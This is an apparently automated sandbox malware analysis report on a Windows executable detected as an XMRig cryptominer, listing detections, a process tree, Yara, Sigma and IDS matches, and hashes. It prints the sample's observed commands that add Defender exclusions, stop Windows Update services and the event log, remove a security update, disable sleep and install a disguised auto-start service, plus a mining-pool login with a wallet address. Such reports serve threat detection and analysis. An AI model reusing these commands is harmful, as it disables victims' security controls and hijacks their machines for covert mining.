Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nW2oopMIdg.exe

Overview

General Information

Sample name:nW2oopMIdg.exe
renamed because original name is a hash value
Original sample name:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c.exe
Analysis ID:1587400
MD5:990a3f3b1273510f210fb9b541da219f
SHA1:33e536c5b4bdb6f6042f93445dffd8a3ad488e8b
SHA256:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nW2oopMIdg.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\nW2oopMIdg.exe" MD5: 990A3F3B1273510F210FB9B541DA219F)
    • powershell.exe (PID: 5988 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1896 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5528 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 3208 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1560 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6464 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6180 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6632 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1976 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2200 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6616 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7084 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 1276 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 2992 cmdline: C:\Windows\system32\sc.exe delete "GeekBrains" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3056 cmdline: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5436 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5528 cmdline: C:\Windows\system32\sc.exe start "GeekBrains" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Lightshot.exe (PID: 3524 cmdline: C:\ProgramData\Screenshots\Lightshot.exe MD5: 990A3F3B1273510F210FB9B541DA219F)
    • powershell.exe (PID: 6572 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5456 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5836 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 1868 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2992 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6536 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 348 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1896 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1120 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6524 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6716 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6300 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7056 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 2284 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 4508 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION
      Process Memory Space: dialer.exe PID: 4508JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: dialer.exe PID: 4508MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x224ff:$a1: mining.set_target
        • 0x1eca8:$a2: XMRIG_HOSTNAME
        • 0x1fa20:$a3: Usage: xmrig [OPTIONS]
        • 0x1ec89:$a4: XMRIG_VERSION

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        65.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          65.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37ef98:$a1: mining.set_target
          • 0x371220:$a2: XMRIG_HOSTNAME
          • 0x373b48:$a3: Usage: xmrig [OPTIONS]
          • 0x3711f8:$a4: XMRIG_VERSION
          65.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          65.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3cd180:$s3: \\.\WinRing0_
          • 0x376148:$s4: pool_wallet
          • 0x3705f0:$s5: cryptonight
          • 0x370600:$s5: cryptonight
          • 0x370610:$s5: cryptonight
          • 0x370620:$s5: cryptonight
          • 0x370638:$s5: cryptonight
          • 0x370648:$s5: cryptonight
          • 0x370658:$s5: cryptonight
          • 0x370670:$s5: cryptonight
          • 0x370680:$s5: cryptonight
          • 0x370698:$s5: cryptonight
          • 0x3706b0:$s5: cryptonight
          • 0x3706c0:$s5: cryptonight
          • 0x3706d0:$s5: cryptonight
          • 0x3706e0:$s5: cryptonight
          • 0x3706f8:$s5: cryptonight
          • 0x370710:$s5: cryptonight
          • 0x370720:$s5: cryptonight
          • 0x370730:$s5: cryptonight

          Sigma Signatures

          Change of critical system settings

          barindex
          Sigma detected: Disable power options
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 1976, ProcessName: powercfg.exe

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5988, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5988, ProcessName: powershell.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 1276, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", ProcessId: 3056, ProcessName: sc.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5988, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Stop EventLog
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5436, ProcessName: sc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T10:36:03.317801+010020479282Crypto Currency Mining Activity Detected192.168.2.5632991.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T10:35:51.244025+010028269302Crypto Currency Mining Activity Detected192.168.2.549704141.94.96.7180TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\ProgramData\Screenshots\Lightshot.exeReversingLabs: Detection: 65%
          Multi AV Scanner detection for submitted file
          Source: nW2oopMIdg.exeVirustotal: Detection: 62%Perma Link
          Source: nW2oopMIdg.exeReversingLabs: Detection: 65%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dialer.exe PID: 4508, type: MEMORYSTR
          Detected Stratum mining protocol
          Source: global trafficTCP traffic: 192.168.2.5:49704 -> 141.94.96.71:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 4d 33 39 44 4d 31 44 51 6a 46 4b 55 6e 54 33 74 32 4b 69 48 4e 55 36 71 51 6a 6d 52 46 37 39 4a 33 31 66 53 62 74 42 4e 61 66 55 58 39 42 32 67 41 77 79 73 6a 4c 46 41 44 51 35 6d 68 71 52 34 4d 36 43 38 4a 4a 52 46 58 77 4c 50 78 44 48 61 70 75 43 72 48 45 33 6d 52 42 6a 54 77 22 2c 22 70 61 73 73 22 3a 22 55 6c 74 69 6d 61 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 67 70 75 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 70 61 6e 74 68 65 72 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46m39dm1dqjfkunt3t2kihnu6qqjmrf79j31fsbtbnafux9b2gawysjlfadq5mhqr4m6c8jjrfxwlpxdhapucrhe3mrbjtw","pass":"ultima","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
          Found strings related to Crypto-Mining
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: dialer.exeString found in binary or memory: cryptonight-monerov7
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: nW2oopMIdg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
